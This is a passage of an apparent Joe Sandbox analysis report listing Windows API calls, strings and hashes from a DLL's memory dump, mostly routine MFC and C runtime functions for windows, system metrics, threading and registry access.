                                          • CopyRect.USER32(?,?), ref: 6FACFCA5
                                          • CopyRect.USER32(?,?), ref: 6FACFCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6FACFCB8
                                            • Part of subcall function 6FACDE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FACDED6
                                          • CopyRect.USER32(?,?), ref: 6FACFCD4
                                          Strings
                                          Similarity
                                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 1385303425-3887548279
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FAEE928,0000000C,6FADA25A,00000000,00000000,?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C), ref: 6FADA131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FADA13C
                                            • Part of subcall function 6FAD5BCF: Sleep.KERNEL32(000003E8,00000000,?,6FADA082,KERNEL32.DLL,?,?,6FADA416,00000000,?,6FAD488C,00000000,?,?,?,6FAD48EF), ref: 6FAD5BDB
                                            • Part of subcall function 6FAD5BCF: GetModuleHandleW.KERNEL32(00000000,?,6FADA082,KERNEL32.DLL,?,?,6FADA416,00000000,?,6FAD488C,00000000,?,?,?,6FAD48EF,?), ref: 6FAD5BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FADA165
                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FADA175
                                          • __lock.LIBCMT ref: 6FADA197
                                          • InterlockedIncrement.KERNEL32(?), ref: 6FADA1A4
                                          • __lock.LIBCMT ref: 6FADA1B8
                                          • ___addlocaleref.LIBCMT ref: 6FADA1D6
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2843748187
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FAC8503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FAC8520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FAC852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FAC853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FAC8547
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6FACA6B6), ref: 6FACA5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FACA5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FACA5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FACA5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FACA601
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1C48
                                          • __aullrem.LIBCMT ref: 6FAC1C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FAC1CE8
                                          • _memset.LIBCMT ref: 6FAC1CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1D07
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FACBE14
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6FACBE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?,?,?,?), ref: 6FACBE43
                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBE77
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEE3
                                          • _memset.LIBCMT ref: 6FACBF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBF34
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          APIs
                                            • Part of subcall function 6FAC815A: GetParent.USER32(?), ref: 6FAC81AE
                                            • Part of subcall function 6FAC815A: GetLastActivePopup.USER32(?), ref: 6FAC81BF
                                            • Part of subcall function 6FAC815A: IsWindowEnabled.USER32(?), ref: 6FAC81D3
                                            • Part of subcall function 6FAC815A: EnableWindow.USER32(?,00000000), ref: 6FAC81E6
                                          • EnableWindow.USER32(?,00000001), ref: 6FAC8247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FAC825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FAC8265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FAC827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FAC82F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6FAC8340
                                          Strings
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 0
                                          • API String ID: 1877664794-4108050209
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FACDED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FACDF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6FACDF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6FACDF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FACDF49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          • Opcode ID: 953ca81d49b54c214ef1035f4868f84f4325dd7f9a69a5476f2f9df1c022f2ac
                                          • Instruction ID: e8abe93a556191512b7aac430c2272419fb28dcc5d91a19f555ce034e8d7abee
                                          • Opcode Fuzzy Hash: 953ca81d49b54c214ef1035f4868f84f4325dd7f9a69a5476f2f9df1c022f2ac
                                          • Instruction Fuzzy Hash: 5721C771544724ABDF108F148D44A9B7BAAFF46B60F048516FD389E184D6B4D481CBE2
                                          APIs
                                          • GetSystemMetrics.USER32(0000000B), ref: 6FACCD75
                                          • GetSystemMetrics.USER32(0000000C), ref: 6FACCD7C
                                          • GetSystemMetrics.USER32(00000002), ref: 6FACCD83
                                          • GetSystemMetrics.USER32(00000003), ref: 6FACCD8D
                                          • GetDC.USER32(00000000), ref: 6FACCD97
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FACCDA8
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FACCDB0
                                          • ReleaseDC.USER32(00000000,00000000), ref: 6FACCDB8
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1151147025-0
                                          • Opcode ID: c71b3de3606543733f5824f327163cb802db03eb4d0b326b53a9cff48bb00164
                                          • Instruction ID: deb6f292ad2254697693a5d590c2de4fe7e14298342aa4d4c9e215b299906518
                                          • Opcode Fuzzy Hash: c71b3de3606543733f5824f327163cb802db03eb4d0b326b53a9cff48bb00164
                                          • Instruction Fuzzy Hash: 07F06DB1E40B15BAEB105B728C49F577F68EB82731F008516E6049B2C0CAB698228FD0
                                          APIs
                                          • _memset.LIBCMT ref: 6FAD029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FAD02C4
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FAD02D6
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FAD02E7
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FAD0303
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 2997958587-3772416878
                                          • Opcode ID: 81f411086fd93f1e4f5bd35ef2fb664c28ae9cc6cb209824a3589ffe0e86661b
                                          • Instruction ID: 59c5d87d1a47aaf5abb19fa6f380cd5bcd7cf62ee7866c4726ff4679b603ce14
                                          • Opcode Fuzzy Hash: 81f411086fd93f1e4f5bd35ef2fb664c28ae9cc6cb209824a3589ffe0e86661b
                                          • Instruction Fuzzy Hash: 0131F4706017109FDB109FB4C988AADBBF5BF48314F15522DF6559B690DB78F480CB94
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FACA20A
                                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FACA2F0
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FACA30D
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACA32D
                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FACA348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                          • String ID: Software\
                                          • API String ID: 1666054129-964853688
                                          • Opcode ID: 64e465a427c4c709fc5ec9d4d6a5a0c731fe876d4c77d0815690e060f738329a
                                          • Instruction ID: 2a8c41260ad29553d1087a25b092791d887a02e78cc8637e389c24a5339e0b3d
                                          • Opcode Fuzzy Hash: 64e465a427c4c709fc5ec9d4d6a5a0c731fe876d4c77d0815690e060f738329a
                                          • Instruction Fuzzy Hash: 4E41A631901628ABCB21DBA4DD98EEEB7B9AF49314F1406D5E119E2190DB38DBC0DF51
                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FACA08C
                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FACA11A
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FACA13D
                                            • Part of subcall function 6FACA02D: __EH_prolog3.LIBCMT ref: 6FACA034
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                          • String ID: Software\Classes\
                                          • API String ID: 3518408925-1121929649
                                          • Opcode ID: 5fe54ef680e9e3134c2de941ef00f536ef8b788863b679682936140df2fd31e0
                                          • Instruction ID: 552c985dca0658680dcf98166acc36a08542064768324a1527df10516d5fe737
                                          • Opcode Fuzzy Hash: 5fe54ef680e9e3134c2de941ef00f536ef8b788863b679682936140df2fd31e0
                                          • Instruction Fuzzy Hash: 6331A631D00228ABCB21EBA4DD58BEDB7B9AF09324F1402D5E85967290D7385FC4DF52
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FACD0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FACD0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FACD0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACD0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACD107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          • Opcode ID: 65baa54e68a1b846ebb39035fa25f0119d42bab37b67964eb55ca4cf0d2a3100
                                          • Instruction ID: 81c54bf89926158069c973d751148e9bbe1f0eb802df27a8b52847fae84d4414
                                          • Opcode Fuzzy Hash: 65baa54e68a1b846ebb39035fa25f0119d42bab37b67964eb55ca4cf0d2a3100
                                          • Instruction Fuzzy Hash: 86112B72D00118BBCB21DB8ACD88CDFBFBDEFC9710B10406AF515A2111D7309A41EB61
                                          APIs
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEB5
                                          • __CxxThrowException@8.LIBCMT ref: 6FACBEBF
                                            • Part of subcall function 6FAD527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FAD52BD
                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBED6
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEE3
                                            • Part of subcall function 6FAC6D89: __CxxThrowException@8.LIBCMT ref: 6FAC6D9F
                                          • _memset.LIBCMT ref: 6FACBF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBF34
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                          • String ID:
                                          • API String ID: 356813703-0
                                          • Opcode ID: 6f652f8d32bd5f9b4f97f12c6a507b3aaf3202bc8affe9c877defc30e1573cf5
                                          • Instruction ID: b7d5b3c41df980a11611e0f572eccebbe404e500217b0d4596883585b62b0e8f
                                          • Opcode Fuzzy Hash: 6f652f8d32bd5f9b4f97f12c6a507b3aaf3202bc8affe9c877defc30e1573cf5
                                          • Instruction Fuzzy Hash: 9511A174100705AFDB10EF64CC89C6ABBB9FF05324710C529F65996660CB35ECA1CF91
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FACCA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FACCA8D
                                            • Part of subcall function 6FACA698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FACA6D0
                                            • Part of subcall function 6FACA698: SetLastError.KERNEL32(0000006F), ref: 6FACA6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FACCADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FACCAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          • Opcode ID: 204159a27c7e1e7ce95ecc0c9b1816515d310d517fd0f88c40de29c68ef81a96
                                          • Instruction ID: 449acd0a59f3249cde2aea03001c51730bec9e3a22d648fcc72ae95938c24a4c
                                          • Opcode Fuzzy Hash: 204159a27c7e1e7ce95ecc0c9b1816515d310d517fd0f88c40de29c68ef81a96
                                          • Instruction Fuzzy Hash: 3301A2715143545FCB10EF64DA18A9A3B99EF45324F05805AF949DB291DF38D880DFA3
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6FACCD2E
                                          • GetSysColor.USER32(00000010), ref: 6FACCD35
                                          • GetSysColor.USER32(00000014), ref: 6FACCD3C
                                          • GetSysColor.USER32(00000012), ref: 6FACCD43
                                          • GetSysColor.USER32(00000006), ref: 6FACCD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6FACCD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6FACCD5E
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          • Opcode ID: 18a9e926392551b791becd5a401baf7cdb67d41ee92ee703d4e888bc007997f0
                                          • Instruction ID: eb38aa43212afe05c272377680212c67a6043d83b58a92cdd4a2941a7e717475
                                          • Opcode Fuzzy Hash: 18a9e926392551b791becd5a401baf7cdb67d41ee92ee703d4e888bc007997f0
                                          • Instruction Fuzzy Hash: D6F012719407445BDB30BF724D09B47BAD1FFC4720F16092EE2458B990D6B6E441DF40
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 6FAC818D
                                          • GetParent.USER32(?), ref: 6FAC819B
                                          • GetParent.USER32(?), ref: 6FAC81AE
                                          • GetLastActivePopup.USER32(?), ref: 6FAC81BF
                                          • IsWindowEnabled.USER32(?), ref: 6FAC81D3
                                          • EnableWindow.USER32(?,00000000), ref: 6FAC81E6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                          • String ID:
                                          • API String ID: 670545878-0
                                          • Opcode ID: 8c615e0ed02b44a53d53d4e257b438ce121f157eb7ba9c84c24a734f969b3051
                                          • Instruction ID: 7874727ee95fb6cea3ff26814e4f4f3386267042b9a07c6311d6a300e8ec7e71
                                          • Opcode Fuzzy Hash: 8c615e0ed02b44a53d53d4e257b438ce121f157eb7ba9c84c24a734f969b3051
                                          • Instruction Fuzzy Hash: 4511A33260DB21ABD7120A698D44B9A77E8BF46F64F0E4126ED14EB240D768E981C6D3
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6FADC43E
                                            • Part of subcall function 6FAD4FC4: __getptd.LIBCMT ref: 6FAD4FD2
                                            • Part of subcall function 6FAD4FC4: __getptd.LIBCMT ref: 6FAD4FE0
                                          • __getptd.LIBCMT ref: 6FADC448
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC456
                                          • __getptd.LIBCMT ref: 6FADC464
                                          • __getptd.LIBCMT ref: 6FADC46F
                                          • _CallCatchBlock2.LIBCMT ref: 6FADC495
                                            • Part of subcall function 6FAD5069: __CallSettingFrame@12.LIBCMT ref: 6FAD50B5
                                            • Part of subcall function 6FADC53C: __getptd.LIBCMT ref: 6FADC54B
                                            • Part of subcall function 6FADC53C: __getptd.LIBCMT ref: 6FADC559
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: 64f627e1ff63a3206b9e3097a59efc2cdf2cf51cceb3014734118375cbca7216
                                          • Instruction ID: e11c8721704f7c2ebadc2e1f7dcfd2446f0fe2f8566010a0db60e8696dc908fd
                                          • Opcode Fuzzy Hash: 64f627e1ff63a3206b9e3097a59efc2cdf2cf51cceb3014734118375cbca7216
                                          • Instruction Fuzzy Hash: 5111B4B1905309DFDF00DFA4C584A9D7BB1FF18315F108169F814A72A1DB399A919B50
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6FACDB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6FACDB81
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FACDB91
                                          • GetWindowRect.USER32(00000000,?), ref: 6FACDBA3
                                          • PtInRect.USER32(?,?,?), ref: 6FACDBB3
                                          • GetWindow.USER32(?,00000005), ref: 6FACDBC0
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                          • String ID:
                                          • API String ID: 1315500227-0
                                          • Opcode ID: a9c6bb15595a824cbb6c43aaead8fd37a67eb84ee6e8e33b601f6f9ddf0b09e1
                                          • Instruction ID: d847402c45b51381a135c203676ecdb4ed4863e17381707c24f4df6cd97f7b2a
                                          • Opcode Fuzzy Hash: a9c6bb15595a824cbb6c43aaead8fd37a67eb84ee6e8e33b601f6f9ddf0b09e1
                                          • Instruction Fuzzy Hash: 6101623214461ABBDF115B54CC08EDE3B6EFF56760F088121F921D6090D738E966DB95
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6FAC96F2
                                          • _memset.LIBCMT ref: 6FAC976A
                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FAC97CD
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FAC97E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 4271682439-3916222277
                                          APIs
                                          • __getptd.LIBCMT ref: 6FADC17F
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC190
                                          • __getptd.LIBCMT ref: 6FADC19E
                                          Strings
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
